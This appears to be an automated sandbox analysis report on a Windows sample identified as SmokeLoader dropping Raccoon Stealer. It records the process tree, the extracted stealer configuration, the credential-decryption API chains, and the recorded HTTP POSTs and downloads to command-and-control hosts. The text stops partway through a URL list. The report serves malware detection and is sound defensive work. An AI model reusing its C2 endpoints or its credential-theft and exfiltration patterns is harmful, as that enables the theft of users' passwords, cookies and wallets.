
Analysis Report y98WYYcJ2U.exe

Overview

General Information

Sample Name:y98WYYcJ2U.exe
Analysis ID:56087
MD5:18b04e2fd804d553d9a35e088193dea7
SHA1:f3dfec27d03905211940da451e9ee1ed500abf33
SHA256:34dea8fb86e0f4d24ce31fb3d0b87d70feea93e48d3e74a3347001ad590f9b43

Most interesting Screenshot:

Detection

Raccoon SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Raccoon Stealer
Yara detected SmokeLoader
Allocates memory in foreign processes
Binary contains a suspicious time stamp
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Renames NTDLL to bypass HIPS
Tries to detect Sandboxie (via GetModuleHandle check)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64_hvm
  • y98WYYcJ2U.exe (PID: 5008 cmdline: 'C:\Users\user\Desktop\y98WYYcJ2U.exe' MD5: 18B04E2FD804D553D9A35E088193DEA7)
    • explorer.exe (PID: 2460 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
      • 3BD3.exe (PID: 4680 cmdline: C:\Users\user\AppData\Local\Temp\3BD3.exe MD5: 8576CCC1310EA39D4AC4B642C7700F91)
        • cmd.exe (PID: 4440 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\3BD3.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • timeout.exe (PID: 4856 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • 48F3.exe (PID: 1300 cmdline: C:\Users\user\AppData\Local\Temp\48F3.exe MD5: 1C886F74C9051CE8BE91FEC2083744F2)
        • msiexec.exe (PID: 2732 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cwfbibg (PID: 4600 cmdline: C:\Users\user\AppData\Roaming\cwfbibg MD5: 18B04E2FD804D553D9A35E088193DEA7)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"Config: ": ["00000000 -> [Raccoon Stealer] - v1.5.13-af-hotfix Release", "Build compiled on Mon Jul  6 14:33:03 2020", "Launched at: 2020.09.14 - 03:55:16 GMT", "Bot_ID: 717E1B34-6140-4FC8-B497-B7800CAA7E40_user", "Running on a desktop", "=R=A=C=C=O=O=N=", "- Cookies: 8", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: -8 hrs", "- IP: 91.132.136.206", "- Location: 47.392502, 8.454600 | Zurich, Zurich, Switzerland (8010)", "- ComputerName: 528110", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (6822 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "============", "Installed Apps:", "Adobe Acrobat Reader DC (18.011.20055)", "Google Chrome (67.0.3396.99)", "Google Update Helper (1.3.33.17)", "Java 8 Update 171 (8.0.1710.11)", "Java Auto Updater (2.8.171.11)", "Mozilla Firefox 72.0.2 (x86 en-US) (72.0.2)", "============"]}

Yara Overview

PCAP (Network Traffic)

Source: dump.pcap | Rule: JoeSecurity_Raccoon | Description: Yara detected Raccoon Stealer | Author: Joe Security

Dropped Files

Source: C:\Users\user\AppData\LocalLow\machineinfo.txt | Rule: JoeSecurity_Raccoon | Description: Yara detected Raccoon Stealer | Author: Joe Security
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll | Rule: ConventionEngine_Keyword_Inject | Description: Searching for PE files with PDB path keywords, terms or anomalies. | Author: @stvemillertime | Strings:
  • 0x17c37:$anchor: inject
  • 0x17c48:$anchor: inject
  • 0x1858a:$anchor: inject
  • 0x19ab8:$anchor: inject
  • 0x17bdc:$pcre: RSDS\x1A\x11\x81\x9AP)\x9AN\x9D\xCF\xA9p\x11yx\x99\x01z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll | Rule: ConventionEngine_Keyword_Hook | Description: Searching for PE files with PDB path keywords, terms or anomalies. | Author: @stvemillertime | Strings:
  • 0x1b30:$anchor: hook
  • 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll | Rule: ConventionEngine_Keyword_Proxy | Description: Searching for PE files with PDB path keywords, terms or anomalies. | Author: @stvemillertime | Strings:
  • 0x1b3f:$anchor: Proxy
  • 0x1e8e:$anchor: Proxy
  • 0x1ee3:$anchor: Proxy
  • 0x2094:$anchor: Proxy
  • 0x20ac:$anchor: Proxy
  • 0x21de:$anchor: Proxy
  • 0x21f6:$anchor: Proxy
  • 0x220f:$anchor: Proxy
  • 0x295a:$anchor: Proxy
  • 0x2ba8:$anchor: Proxy
  • 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
Source: C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll | Rule: ConventionEngine_Keyword_Hook | Description: Searching for PE files with PDB path keywords, terms or anomalies. | Author: @stvemillertime | Strings:
  • 0x1b30:$anchor: hook
  • 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb

Memory Dumps

Source: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp | Rule: JoeSecurity_Raccoon | Description: Yara detected Raccoon Stealer | Author: Joe Security

Unpacked PEs

Source: 0.2.y98WYYcJ2U.exe.400000.0.raw.unpack | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 0.2.y98WYYcJ2U.exe.400000.0.unpack | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpack | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 3.2.cwfbibg.400000.0.raw.unpack | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security
Source: 3.2.cwfbibg.400000.0.unpack | Rule: JoeSecurity_SmokeLoader | Description: Yara detected SmokeLoader | Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: machineinfo.txt.4.dr.binstr | Malware Configuration Extractor: Raccoon Stealer (configuration as listed under Malware Configuration above)
Yara detected Raccoon Stealer
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED
Machine Learning detection for sample
Source: y98WYYcJ2U.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_0040A5D7 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,4_2_0040A5D7
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_00423030 CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,4_2_00423030
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_00423203 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,4_2_00423203
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_004094E8 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,4_2_004094E8
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_0040B586 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,4_2_0040B586
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_00409BD7 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,4_2_00409BD7
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_0041A0CC __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,4_2_0041A0CC
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_00408F24 __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,4_2_00408F24
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_00433A25 lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,4_2_00433A25
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_0043DD11 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,4_2_0043DD11
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_0045F48D FindFirstFileExW,4_2_0045F48D
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_0043DD31 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,4_2_0043DD31
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_0043DE7C GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,4_2_0043DE7C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0267A650 GetVersionExW,FindFirstFileW,FindNextFileW,9_2_0267A650
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_00434B68 __EH_prolog,GetLogicalDriveStringsA,4_2_00434B68
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\idb\
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx esi, word ptr [edi] 5_2_004178C0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then mov edi, dword ptr [ebp+14h] 5_2_0040E8B0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then push 60303581h 5_2_004071B0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx eax, word ptr [esi] 5_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx ebx, word ptr [edi] 5_2_00414240
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movsx eax, byte ptr [edi] 5_2_00409220
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then push 00000000h 5_2_00402300
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movsx ebx, byte ptr [esi] 5_2_00401300
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then add esi, 02h 5_2_004033E0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h 5_2_00417460
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl 5_2_00405540
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then push FFFFFFFFh 5_2_00402500
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx eax, word ptr [ebx+edi*2] 5_2_00406EA0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then push ebp 5_2_001E905F
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx eax, word ptr [ebx+edi*2] 5_2_001D70F0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx esi, word ptr [edi] 5_2_001E7B10
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then mov edi, dword ptr [ebp+14h] 5_2_001DEB00
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then push 60303581h 5_2_001D7400
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movsx eax, byte ptr [edi] 5_2_001D9470
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movsx eax, byte ptr [edi] 5_2_001D9468
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx eax, word ptr [esi] 5_2_001DD490
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movzx ebx, word ptr [edi] 5_2_001E4490
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then movsx ebx, byte ptr [esi] 5_2_001D1550
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then push 00000000h 5_2_001D2550
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then add esi, 02h 5_2_001D3630
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h 5_2_001E76B0
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then push FFFFFFFFh 5_2_001D2750
Source: C:\Users\user\AppData\Local\Temp\48F3.exe | Code function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl 5_2_001D5790
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, word ptr [esi] 9_2_0266D240
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx ebx, word ptr [edi] 9_2_02674240
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movsx eax, byte ptr [edi] 9_2_02669220
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then push 00000000h 9_2_02662300
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movsx ebx, byte ptr [esi] 9_2_02661300
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then add esi, 02h 9_2_026633E0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx esi, word ptr [edi] 9_2_026778C0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov edi, dword ptr [ebp+14h] 9_2_0266E8B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then push 60303581h 9_2_026671B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, word ptr [ebx+edi*2] 9_2_02666EA0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h 9_2_02677460
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl 9_2_02665540
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then push FFFFFFFFh 9_2_02662500

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018316 ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.3:60913
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Sun, 13 Sep 2020 18:55:06 GMT | Content-Type: application/octet-stream | Content-Length: 916735 | Connection: close | Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT | ETag: "5c8ff6ea-dfcff" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: POST /gate/log.php HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Content-Length: 155 | Host: chinadevmonster.top
Source: global traffic | HTTP traffic detected: POST /file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c2192b8881e9e86fdae59338948668354bcd5e2d&callback=http://chinadevmonster.top/gate HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: multipart/form-data, boundary=4k683b59nd0j798043458n | Content-Length: 2211 | Host: chinadevmonster.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://2831ujedkdajsdj.info/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 336 | Host: 2831ujedkdajsdj.info
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://2831ujedkdajsdj.info/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 180 | Host: 2831ujedkdajsdj.info
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://2831ujedkdajsdj.info/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 139 | Host: 2831ujedkdajsdj.info
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://2831ujedkdajsdj.info/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 144 | Host: 2831ujedkdajsdj.info
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://2831ujedkdajsdj.info/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 294 | Host: 2831ujedkdajsdj.info
Source: global traffic | HTTP traffic detected: GET /gate/sqlite3.dll HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: chinadevmonster.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /gate/libs.zip HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: chinadevmonster.top | Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\Temp\3BD3.exe | Code function: 4_2_004336F3 LoadLibraryA,FreeLibrary,LoadLibraryA,GetProcAddress,URLDownloadToFileA,4_2_004336F3
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Sun, 13 Sep 2020 18:55:12 GMT | Content-Type: application/zip | Content-Length: 2828315 | Connection: close | Last-Modified: Wed, 03 Apr 2019 07:47:18 GMT | ETag: "5ca46506-2b281b" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: GET /gate/sqlite3.dll HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: chinadevmonster.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /gate/libs.zip HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: chinadevmonster.top | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: dkajsdjiqwdwnfj.info
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://2831ujedkdajsdj.info/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 336 | Host: 2831ujedkdajsdj.info
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.16.1 | Date: Sun, 13 Sep 2020 18:54:41 GMT | Content-Type: text/html; charset=windows-1251 | Transfer-Encoding: chunked | Connection: keep-alive | X-Powered-By: PHP/7.2.31 | Data Raw: 31 38 0d 0a 13 00 00 00 63 07 35 6e ed cd cf 93 0a 8d c8 6b 6d 7d e5 a4 9e 64 5c 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 18c5nkm}d\0
Source: explorer.exe, 00000002.00000003.1406505926.000000000AC63000.00000004.00000001.sdmp | String found in binary or memory: http://2831ujedkdajsdj.info/
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AccessibleHandler.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/0Y
Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531805660.000000004B415000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gate
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gate/libs.zip
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gate/log.php
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gate/log.phpditional
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gate/log.phpn
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gate/sqlite3.dll
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gate/sqlite3.dllnnel%
Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gatea
Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp | String found in binary or memory: http://chinadevmonster.top/gatel
Source: nssckbi.dll.4.dr | String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.4.dr | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letm6
